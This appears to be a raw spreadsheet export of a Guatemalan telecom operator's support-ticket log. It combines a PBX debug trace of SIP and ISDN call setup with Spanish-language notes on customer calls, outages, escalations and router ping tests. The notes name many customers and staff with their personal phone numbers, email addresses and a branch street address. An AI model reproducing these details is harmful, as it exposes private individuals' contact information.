MIN-SE: 600
P-ASSERTED-IDENTITY: &lt;SIP:24148921@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;
P-CALLED-PARTY-ID: &lt;TEL:+50222088558&gt;
P-NOTIFICATION: CALLER-CONTROL
CONTENT-LENGTH: 167
CONTENT-TYPE: APPLICATION/SDP
V=0
O=- 42935964 42935964 IN IP4 10.16.246.198
S=SBC CALL
C=IN IP4 10.16.246.198
T=0 0
M=AUDIO 29616 RTP/AVP 8 0 18
A=FMTP:18 ANNEXB=NO
A=PTIME:20
A=SENDRECV
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
L1: U 18/05/2022 16:26:55:550 VOIP:
&gt;&gt;&gt; SIP TX NOT RELIABLY TO 10.16.246.199:5060:
SIP/2.0 100 TRYING
VIA: SIP/2.0/UDP 10.16.246.199:5060;BRANCH=Z9HG4BKG3Q3KJ6DLV6DRBVGVLVOMLB3IT28198;RECEIVED=10.16.246.199
FROM: &lt;SIP:24148921@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC04050XRGJRRH-CC-7
TO: &lt;SIP:+50222088558@10.16.246.199:5060;TRANSPORT=UDP;USER=PHONE&gt;
CALL-ID: ASBC8AP010AV2HRAG0RIX8XPVVXLGX2I1XZ3@ATS.GVATS1.IMSHWI.CLARO.COM.GT.7
CSEQ: 1 INVITE
SERVER: AETHRA TELECOMMUNICATIONS PBX
ALLOW: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, UPDATE, PRACK
SESSION-EXPIRES: 600;REFRESHER=UAS
CONTACT: &lt;SIP:+50222088558@10.78.79.43&gt;
CONTENT-LENGTH: 0
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
L2: U 18/05/2022 16:26:55:600 ISDN-PRI1: PRIMITIVE FROM IWF TO NT = CONN_REQ CALL_ID=0
L1: U 18/05/2022 16:26:55:600 OFISDN: ISDN-PRI D 1 TX:  02 01 FC A2 08 02 00 01 05 04 03 80 90 A3 18 03 A9 83 81 6C 09 80 32 34 31 34 38 39 32 31 70 09 A1 32 32 30 38 38 35 35 38 A1 7D 02 91 81
   SAPI:0  TEI:0  C/R:1=C  P/F:P=0
   FRAME:INFO  NR:81  NS:126
   CREF:OR1 MSG:SETUP
   BEARER CAPABILITY
    CODING STANDARD: CCITT
    INFORM.TRANSF.CAP.: SPEECH
    TRANSFER MODE: CIRCUIT
    INFO TRANSF. RATE: 64 KB/S
    USER INFO LAYER 1: G711 A-LAW
   CHANNEL IDENTIF.
    INTERFACE TYPE: PRIMARY
    PREF/EXCL: EXCLUSIVE
    CHANNEL SELECTION: AS IN FOLLOW.OCTETS
    CODING STANDARD: CCITT
    NUMBER/MAP: INDICATED BY NUMBER
    CHANNEL TYPE: B-CHAN UNITS
    CHANNEL NUMBER: [1]
   CALLING PARTY NUMBER
    TYPE OF NUMBER: UNKNOWN
    NUMBERING PLAN: UNKNOWN
    CLI: [24148921]
   CALLED PARTY NUMBER
    TYPE OF NUMBER: NATIONAL
    NUMBERING PLAN: ISDN/TELEPHONY
    CALLED: [22088558]
   SENDING COMPLETE
   HIGH LAYER COMPATIB.
    CODING STANDARD: CCITT
    INTERPRETATION: 1ST HLC TO BE USED
    PRESENTATION METHOD: HI-LAY. PROTOCOL
    HLC ID.: TELEPHONY
L1: U 18/05/2022 16:26:55:630 OFISDN: ISDN-PRI D 1 RX:  00 01 A2 FE 08 02 80 01 02 18 03 A9 83 81
   SAPI:0  TEI:0  C/R:0=C  P/F:P=0
   FRAME:INFO  NR:127  NS:81
   CREF:DS1 MSG:CALL PROC
   CHANNEL IDENTIF.
    INTERFACE TYPE: PRIMARY
    PREF/EXCL: EXCLUSIVE
    CHANNEL SELECTION: AS IN FOLLOW.OCTETS
    CODING STANDARD: CCITT
    NUMBER/MAP: INDICATED BY NUMBER
    CHANNEL TYPE: B-CHAN UNITS
    CHANNEL NUMBER: [1]
L1: U 18/05/2022 16:26:55:630 OFISDN: ISDN-PRI D 1 RX:  00 01 A4 FE 08 02 80 01 01
   SAPI:0  TEI:0  C/R:0=C  P/F:P=0
   FRAME:INFO  NR:127  NS:82
   CREF:DS1 MSG:ALERTING
L1: U 18/05/2022 16:26:55:630 VOIP:
&gt;&gt;&gt; SIP TX TO 10.16.246.199:5060:
SIP/2.0 180 RINGING
VIA: SIP/2.0/UDP 10.16.246.199:5060;BRANCH=Z9HG4BKG3Q3KJ6DLV6DRBVGVLVOMLB3IT28198;RECEIVED=10.16.246.199
FROM: &lt;SIP:24148921@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC04050XRGJRRH-CC-7
TO: &lt;SIP:+50222088558@10.16.246.199:5060;TRANSPORT=UDP;USER=PHONE&gt;;TAG=AS3111FBEB
CALL-ID: ASBC8AP010AV2HRAG0RIX8XPVVXLGX2I1XZ3@ATS.GVATS1.IMSHWI.CLARO.COM.GT.7
CSEQ: 1 INVITE
SERVER: AETHRA TELECOMMUNICATIONS PBX
RSEQ: 1171143433
ALLOW: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, UPDATE, PRACK
REQUIRE: 100REL
SESSION-EXPIRES: 600;REFRESHER=UAS
CONTACT: &lt;SIP:+50222088558@10.78.79.43&gt;
CONTENT-LENGTH: 0
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
L1: U 18/05/2022 16:26:55:820 VOIP:
&lt;&lt;&lt; SIP RX FROM 10.16.246.199:5060:
PRACK SIP:+50222088558@10.78.79.43 SIP/2.0
VIA: SIP/2.0/UDP 10.16.246.199:5060;BRANCH=Z9HG4BK3QBRKR3RXLMOHVBDKO6V33JXRT28201
CALL-ID: ASBC8AP010AV2HRAG0RIX8XPVVXLGX2I1XZ3@ATS.GVATS1.IMSHWI.CLARO.COM.GT.7
FROM: &lt;SIP:24148921@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC04050XRGJRRH-CC-7
TO: &lt;SIP:+50222088558@10.16.246.199:5060;TRANSPORT=UDP;USER=PHONE&gt;;TAG=AS3111FBEB
CSEQ: 2 PRACK
MAX-FORWARDS: 66
RACK: 1171143433 1 INVITE
CONTENT-LENGTH: 0
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
L1: U 18/05/2022 16:26:55:820 VOIP:
&gt;&gt;&gt; SIP TX NOT RELIABLY TO 10.16.246.199:5060:
SIP/2.0 200 OK
VIA: SIP/2.0/UDP 10.16.246.199:5060;BRANCH=Z9HG4BK3QBRKR3RXLMOHVBDKO6V33JXRT28201;RECEIVED=10.16.246.199
FROM: &lt;SIP:24148921@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC04050XRGJRRH-CC-7
TO: &lt;SIP:+50222088558@10.16.246.199:5060;TRANSPORT=UDP;USER=PHONE&gt;;TAG=AS3111FBEB
CALL-ID: ASBC8AP010AV2HRAG0RIX8XPVVXLGX2I1XZ3@ATS.GVATS1.IMSHWI.CLARO.COM.GT.7
CSEQ: 2 PRACK
SERVER: AETHRA TELECOMMUNICATIONS PBX
ALLOW: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, UPDATE, PRACK
CONTENT-LENGTH: 0
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
L1: U 18/05/2022 16:26:58:370 OFISDN: ISDN-PRI D 1 RX:  00 01 A6 FE 08 02 80 01 07 4C 09 21 80 32 32 30 38 31 30 31
   SAPI:0  TEI:0  C/R:0=C  P/F:P=0
   FRAME:INFO  NR:127  NS:83
   CREF:DS1 MSG:CONNECT
   CONNECTED NUMBER
    TYPE OF NUMBER: NATIONAL
    NUMBERING PLAN: ISDN/TELEPHONY
    PRESENTATION: ALLOWED
    SCREENING: USR-PROV,UNSCREENED
    NUMBER DIGITS: [2208101]
L1: U 18/05/2022 16:26:58:370 OFISDN: ISDN-PRI D 1 TX:  02 01 FE A8 08 02 00 01 0F
   SAPI:0  TEI:0  C/R:1=C  P/F:P=0
   FRAME:INFO  NR:84  NS:127
   CREF:OR1 MSG:CONN ACK
L1: U 18/05/2022 16:26:58:380 VOIP:
&gt;&gt;&gt; SIP TX TO 10.16.246.199:5060:
SIP/2.0 200 OK
VIA: SIP/2.0/UDP 10.16.246.199:5060;BRANCH=Z9HG4BKG3Q3KJ6DLV6DRBVGVLVOMLB3IT28198;RECEIVED=10.16.246.199
FROM: &lt;SIP:24148921@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC04050XRGJRRH-CC-7
TO: &lt;SIP:+50222088558@10.16.246.199:5060;TRANSPORT=UDP;USER=PHONE&gt;;TAG=AS3111FBEB
CALL-ID: ASBC8AP010AV2HRAG0RIX8XPVVXLGX2I1XZ3@ATS.GVATS1.IMSHWI.CLARO.COM.GT.7
CSEQ: 1 INVITE
SERVER: AETHRA TELECOMMUNICATIONS PBX
ALLOW: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, UPDATE, PRACK
REQUIRE: TIMER
SESSION-EXPIRES: 600;REFRESHER=UAS
CONTACT: &lt;SIP:+50222088558@10.78.79.43&gt;
CONTENT-TYPE: APPLICATION/SDP
CONTENT-LENGTH: 255
V=0
O=ROOT 574136262 574136262 IN IP4 10.78.79.43
S=AETHRA TELECOMMUNICATIONS PBX
C=IN IP4 10.78.79.43
T=0 0
M=AUDIO 5100 RTP/AVP 8 0 18
A=RTPMAP:8 PCMA/8000
A=RTPMAP:0 PCMU/8000
A=RTPMAP:18 G729/8000
A=FMTP:18 ANNEXB=NO
A=PTIME:20
A=SENDRECV
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
L1: U 18/05/2022 16:26:58:540 VOIP:
&lt;&lt;&lt; SIP RX FROM 10.16.246.199:5060:
ACK SIP:+50222088558@10.78.79.43 SIP/2.0
VIA: SIP/2.0/UDP 10.16.246.199:5060;BRANCH=Z9HG4BK3I6GLOXIX3VBGRQJVVXXIKOJHT28226
CALL-ID: ASBC8AP010AV2HRAG0RIX8XPVVXLGX2I1XZ3@ATS.GVATS1.IMSHWI.CLARO.COM.GT.7
FROM: &lt;SIP:24148921@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC04050XRGJRRH-CC-7
TO: &lt;SIP:+50222088558@10.16.246.199:5060;TRANSPORT=UDP;USER=PHONE&gt;;TAG=AS3111FBEB
CSEQ: 1 ACK
MAX-FORWARDS: 66
CONTENT-LENGTH: 0
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
L1: U 18/05/2022 16:26:58:540 VOIP:
&lt;&lt;&lt; SIP RX FROM 10.16.246.199:5060:
INVITE SIP:+50222088558@10.78.79.43 SIP/2.0
VIA: SIP/2.0/UDP 10.16.246.199:5060;BRANCH=Z9HG4BKDLKMMHIVKXOHKJBRGOXL6DKMDT28227
CALL-ID: ASBC8AP010AV2HRAG0RIX8XPVVXLGX2I1XZ3@ATS.GVATS1.IMSHWI.CLARO.COM.GT.7
FROM: &lt;SIP:24148921@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC04050XRGJRRH-CC-7
TO: &lt;SIP:+50222088558@10.16.246.199:5060;TRANSPORT=UDP;USER=PHONE&gt;;TAG=AS3111FBEB
CSEQ: 3 INVITE
CONTACT: &lt;SIP:24148921@10.16.246.199:5060;USER=PHONE&gt;
MAX-FORWARDS: 66
SUPPORTED: TIMER
SESSION-EXPIRES: 600;REFRESHER=UAS
MIN-SE: 90
CONTENT-LENGTH: 141
CONTENT-TYPE: APPLICATION/SDP
V=0
O=- 42935964 42935965 IN IP4 10.16.246.198
S=SBC CALL
C=IN IP4 10.16.246.198
T=0 0
M=AUDIO 29616 RTP/AVP 8
A=PTIME:20
A=SENDRECV
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
L1: U 18/05/2022 16:26:58:540 VOIP:
&gt;&gt;&gt; SIP TX NOT RELIABLY TO 10.16.246.199:5060:
SIP/2.0 100 TRYING
VIA: SIP/2.0/UDP 10.16.246.199:5060;BRANCH=Z9HG4BKDLKMMHIVKXOHKJBRGOXL6DKMDT28227;RECEIVED=10.16.246.199
FROM: &lt;SIP:24148921@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC04050XRGJRRH-CC-7
TO: &lt;SIP:+50222088558@10.16.246.199:5060;TRANSPORT=UDP;USER=PHONE&gt;;TAG=AS3111FBEB
CALL-ID: ASBC8AP010AV2HRAG0RIX8XPVVXLGX2I1XZ3@ATS.GVATS1.IMSHWI.CLARO.COM.GT.7
CSEQ: 3 INVITE
SERVER: AETHRA TELECOMMUNICATIONS PBX
ALLOW: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, UPDATE, PRACK
SESSION-EXPIRES: 600;REFRESHER=UAS
CONTACT: &lt;SIP:+50222088558@10.78.79.43&gt;
CONTENT-LENGTH: 0
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
L1: U 18/05/2022 16:26:58:540 VOIP:
&gt;&gt;&gt; SIP TX TO 10.16.246.199:5060:
SIP/2.0 200 OK
VIA: SIP/2.0/UDP 10.16.246.199:5060;BRANCH=Z9HG4BKDLKMMHIVKXOHKJBRGOXL6DKMDT28227;RECEIVED=10.16.246.199
FROM: &lt;SIP:24148921@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC04050XRGJRRH-CC-7
TO: &lt;SIP:+50222088558@10.16.246.199:5060;TRANSPORT=UDP;USER=PHONE&gt;;TAG=AS3111FBEB
CALL-ID: ASBC8AP010AV2HRAG0RIX8XPVVXLGX2I1XZ3@ATS.GVATS1.IMSHWI.CLARO.COM.GT.7
CSEQ: 3 INVITE
SERVER: AETHRA TELECOMMUNICATIONS PBX
ALLOW: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, UPDATE, PRACK
REQUIRE: TIMER
SESSION-EXPIRES: 600;REFRESHER=UAS
CONTACT: &lt;SIP:+50222088558@10.78.79.43&gt;
CONTENT-TYPE: APPLICATION/SDP
CONTENT-LENGTH: 184
V=0
O=ROOT 574136262 574136263 IN IP4 10.78.79.43
S=AETHRA TELECOMMUNICATIONS PBX
C=IN IP4 10.78.79.43
T=0 0
M=AUDIO 5100 RTP/AVP 8
A=RTPMAP:8 PCMA/8000
A=PTIME:20
A=SENDRECV
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;
L1: U 18/05/2022 16:26:58:610 VOIP:
&lt;&lt;&lt; SIP RX FROM 10.16.246.199:5060:
ACK SIP:+50222088558@10.78.79.43 SIP/2.0
VIA: SIP/2.0/UDP 10.16.246.199:5060;BRANCH=Z9HG4BKOMJRHHIXGVLDIXHMDD3VRQHGQT28228
CALL-ID: ASBC8AP010AV2HRAG0RIX8XPVVXLGX2I1XZ3@ATS.GVATS1.IMSHWI.CLARO.COM.GT.7
FROM: &lt;SIP:24148921@IMSHWI.CLARO.COM.GT;USER=PHONE&gt;;TAG=SBC04050XRGJRRH-CC-7
TO: &lt;SIP:+50222088558@10.16.246.199:5060;TRANSPORT=UDP;USER=PHONE&gt;;TAG=AS3111FBEB
CSEQ: 3 ACK
MAX-FORWARDS: 69
CONTENT-LENGTH: 0
&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;
ROBERTOWAGNER_90001907660\VOIP&gt;&gt;
ROBERTOWAGNER_90001907660\VOIP&gt;&gt;
ROBERTOWAGNER_90001907660\VOIP&gt;&gt;
ROBERTOWAGNER_90001907660\VOIP&gt;&gt;LOG STOP
COMMAND EXECUTED</t>
  </si>
  <si>
    <t>F4567738</t>
  </si>
  <si>
    <t>SE LE LLAMA AL CL SELVIN PAIZ AL 59761983 ID 3001508459 PARA EL SEGUIMIENTO SE VALIDA QUE TIENE PRUEBAS PENDIENTES Y SE CONTACTA AL GESTOR MIGUEL RODRIGUEZ AL 8126 ID 3001509294 INGRESA LA LLAMADA CON EL Y NO LO ATIENDE, LUEGO INGRESA A YENSI CALGUA Y SE LE BRINDA LA INFORMACIÓN Y CONTACTA AL GESTOR  PERO NO RESPONDE NUEVAMENTE.
ID 3001509294
NÚMERO: 5147
DURACIÓN: 0:02:23
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
USUARIO DE IC: GUSTAVO.BARAHONA
FECHA: 19/05/2022
HORA:  09:08:53
SE LLAMA NUEVAMETE AL 8126 ID 3001512427 INGRESA NUEVAMENTE A MIGUEL RODRIGUEZ Y NO REPONDE INGRESA CON OTRO GESTOR YENSI CALGUA Y PASA LO MISMO, SE ESCALA CON JUAN MANUEL CARDONA AL 41287321 ID 3001514637    SE LE BRINDA LA INFORMACIÓN Y  DEJA AÑ GESTOR EN LINEA SE LE INFORMA AL GESTOR JHONSER ESCOBAR Y SE DEJA CON EL CL EN LINEA.</t>
  </si>
  <si>
    <t>**SE LLAMA CLIENTE SELVIN PAIZ AL 59761983 CLIENTE INDICA QUE EL SERVICIO ESTA CAIDO || SE NOTIFICA A GESTOR**
ID 2001228214
**</t>
  </si>
  <si>
    <t>-* EB BASE A CRONOS ANTERIORES, SE VALIDA QUE NO APLICA ESTADO PC, SE CAMBIA A WP Y SE NOTIFICA A CNOC VIA SKYPE -*
-*</t>
  </si>
  <si>
    <t>F4567782</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE ENCARGADO EN SITIO 22160072 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001231669
***</t>
  </si>
  <si>
    <t>F4567791</t>
  </si>
  <si>
    <t xml:space="preserve">   SE LLAMO A CLIENTE SR. MAURICIO PEÑA 77493031 VALIDO QUE LOS EQUIPOS TIENEN ENERGIA ELECTRICA PERO LA IDU DEL RADIO REMOTO ESTA ALARMADA POSIBLEMENTE DAÑADO, SOLICITA LA VISITA TENICA PARA MAÑANA JUEVES DESDE LAS 8:00 AM POR FAVOR ENVIAR DATOS DE PERSONAL TECNICO A SU CORREO. GRACIAS...</t>
  </si>
  <si>
    <t>F4567803</t>
  </si>
  <si>
    <t xml:space="preserve"> 18/05/2022 15:36:32 GUATEMALA/CENTRO AMERICA (OMAR ALBERTO OCHOA HID):
SE CONTACTA A CLIENTE DIEGO HERNÁNDEZ 25279044 QUIEN INDICA QUE AHORA VE ESTABLE EL ENLACE, INDICA QUE SE LE LLAME A LAS 5 DE LA TARDE PARA VALIDAR EL ENLACE.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DIEGO HERNÁNDEZ 25279044 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001245999</t>
  </si>
  <si>
    <t>F4567811</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE AUGUSTO GIL QUIEN ESTA UBICANDO EL EQUIPO.
3001201770
COLA:
NOMBRE: A: 47372931
NÚMERO: 47372931
DURACIÓN: 0:00:22
ESTADO: CONECTADA
DETALLES: 47372931
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 18/05/2022 14:27:03</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE AUGUSTO GIL QUIEN INDICA QUE YA POSEE LLAMADAS SALIENTES Y SOLICITA QUE SE VALIDE EL SERVICIO EL DIA DE MAÑANA A LAS 10:00AM
3001249684
COLA:
NOMBRE: A: 47372931
NÚMERO: 47372931
DURACIÓN: 0:00:30
ESTADO: CONECTADA
DETALLES: 47372931
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 18/05/2022 16:30:58</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE AGUSTO GIL 47372931   QUIEN CONFIRMAR EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001594307</t>
  </si>
  <si>
    <t>F4567812</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE WILVER MAGAÑA 30060665 ID: 3001227013
CONFIRMA SERVICIO OK, AUTORIZA CIERRE DE TKT | SE NOTIFICA A 3001227013 VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>F4567819</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LILIAN RECINOS AL 71842951 INDICA QUE ESTA PRESENTANDO PERDIDAS DE PAQUETES || SE NOTIFICA A GESTOR**
ID 3001234981
**</t>
  </si>
  <si>
    <t>F4567828</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 14:34PARA: TIC-TELECOM@BANRURAL.COM.GT &lt;TIC-TELECOM@BANRURAL.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_BANRURAL_GT_AGENCIA_049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67828
ID: 8902556T
IDENTIFICADOR DEL CLIENTE:  CC_BANRURAL_GT_AGENCIA_049
UBICADO EN:  KM. 259 CAMBOTE ZONA 11, SOBRE LA CALZADA KAIBIL BALAM, HUEHUETENANGO HUEHUETENANGO HUEHUETENANGO LA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4567836</t>
  </si>
  <si>
    <t>NO SE CUENTA CON RESPUESTA DE LA COLA DE CORREOS, SE LE LLAMA AL PR ENCARGADO DE TURNO AL 23320329 ID 3001562436 ATIENDE JAVIER PARA EL SEGUIMIENTO  Y DESCONOCE LA INFORMACIÓN, COMENTA QUE LO VALIDARA CON EL CL POR LO QUE SE LE INDICA QUE EL LO REPORTO PARA EL SEGUIMIENTO CON ELLOS Y HACER PRUEBAS Y DESCONOCE TAMBIÉN EL CORREO QUE APARECE EN LA CRONOLOGÍA QUE SE NOTIFICA QUE A NIVEL DE CLARO ESTA OPERATIVO Y NO SABE DONDE BRINDAR EL SEGUIMIENTO CONFIRMA CON OTRA ÁREA Y COMENTA QUE SE DEBE DE CONTACTAR AL 24266000 EXT 31785 CON ELIO MONZON SE LE LLAMA ID 3001570801 ATIENDE GERARDO LARA, SE LE BRINDA LA INFORMACIÓN Y COMENTA QUE NO TIENE CONOCIMIENTO Y NO ESTA EN EL PAIS Y COMENTA QUE SE LE COPIE A LA COLA DE CORREOS A COMUNICACIONESLAN@BI.COM.GT POR LO QUE NO SE PUEDE COPIAR SI NO COREESPONDE SE LLAMA AL CL 0013059210971 CON BOSCO GARCIA ID 3001578288 ATIENDE LUIS HERNANDEZ  Y DESCONOCE A ESTA PERSONA POR LO QUE SE LE LLAMA AL GESTOR A CARGO MIGUELAN.RODRIGUEZ AL  8126 ID 3001582620 ATIENDE GERSON Y CONFIRMA EL CIERRE DEL TICKET PORQUE GENERA UN PING Y SI TIENE CONEXIÓN  Y PROCEDER CON EL CIERRE CON TICKET</t>
  </si>
  <si>
    <t>F4567867</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO DELGADO 82369086 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001190022 - 1001190338</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE FERNANDO DELGADO 82369086 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE LE NOTIFICA QUE A NIVEL DE CLARO SE OBSERVA TODO BIEN Y SE LE SOLICITA QUE PUEDA VALIDAR DE MANERA INTERNA
-ID 1001102989</t>
  </si>
  <si>
    <t>EN COMUNICACION CON CLIENTE WILFREDO Y TECNICO GUSTAVO REALIZANDO PRUEBAS, CLIENTE CONFIRMA SERVICIO</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE  FERNANDO DELGADO 82369086 MENCIONA QUE PERSISTE EL PROBLEMA PERO YA NO HAY NADIE EN PR POR LO QUE SOLICITA LLAMADA PARA  EL DIA LUNES A LAS 8:20
-ID 1001262997</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE FERNANDO DELGADO 82369086 MENCIONA QUE AUN NO HA LLEGADO A PR POR LO QUE SOLICITA LLAMADA EN 30  MIN
-ID 1001087703</t>
  </si>
  <si>
    <t>EN LINEA CON TECNICO Y CLIENTE WILFREDO, SE ESTA REALIZANDO PRUEBAS DE PING, SE LE INDICA A CLINTE QUE SE LLEGA A LA IP 10.29.37.185 PERO AL LA OTRA DIRECCION SIN RESPUESTA. , 10.29.37.190,
DGI_JUIGALPA_CHONTALES#PING 10.29.37.185 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 10.29.37.185, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 10.16.224.1
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 1/3/4 MS
DGI_JUIGALPA_CHONTALES#PING 10.29.37.190 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 10.29.37.190, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 10.16.224.1
.....
SUCCESS RATE IS 0 PERCENT (0/5)</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FERNANDO DELGADO 8236-9086 INDICA QUE AUN PERSISTE EL INCONVENIENTE || SE NOTIFICA
 A GESTOR **
ID 3001238130
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FERNANDO DELGADO AL 82369086   INDICA QUE PERSISTE EL INCONVENIENTE SE LE SOLICITAN PRUEBAS DEL INCONVENIENTE PRESENTADO AL CORREO, Y SE LE BRINDAN LOS CORREOS CL INDICA QUE ESTARA ENVIANDO LAS PRUEBAS**
ID 1001578931
**</t>
  </si>
  <si>
    <t>F4567888</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALLAN GONZALES AL 37627776 NO RESPONDE, SE INTENTARA LUEGO **
ID 3001818999
**</t>
  </si>
  <si>
    <t>F4567904</t>
  </si>
  <si>
    <t>CLIENTE INDICA
BUENA TARDE, TENDRÁN INFORMACIÓN DE LA SUCURSAL CC_AZTECA_GT_SUC007826/265900223T?
JORGE, 15:19
BUENAS TARDES, NO SE CUENTA CON ENERGÍA EN EL SECTOR</t>
  </si>
  <si>
    <t>F4567905</t>
  </si>
  <si>
    <t>IRIS MONTES-78865035 CONFIRMA QUE EL PROBLEMA QUE TINE ES VOZ ROBOTIZADA, PERDIDA DE AUDIO Y RUIDO EN LLAMADA
 ##VIVO</t>
  </si>
  <si>
    <t>F4567910</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ERNESTO RUBIO AL 25562049  INDICA QE SIGUE VIENDO PERDIDA DE PAQUETES TAMBIEN INDICA QUE ENVIO CORREO CON PRUEBAS || SE NOTIFICA A GESTOR **
ID 3001239858
**</t>
  </si>
  <si>
    <t>CAMBIO DE PUNETE EN REPARTIDOR  Y EN MDF EN NODO ENLACE ACTIVO NO SE TIENE GESTION DE EQUIPO CPE, SE VALIDA CON CLIENTE EN SITIO
SSSASVYGN1D1EID1&gt;PING -C 1000 -S 1500 -M 30 -B -VPN-INSTANCE HSBC_ATM 10.147.58.101
  PING 10.147.58.101: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!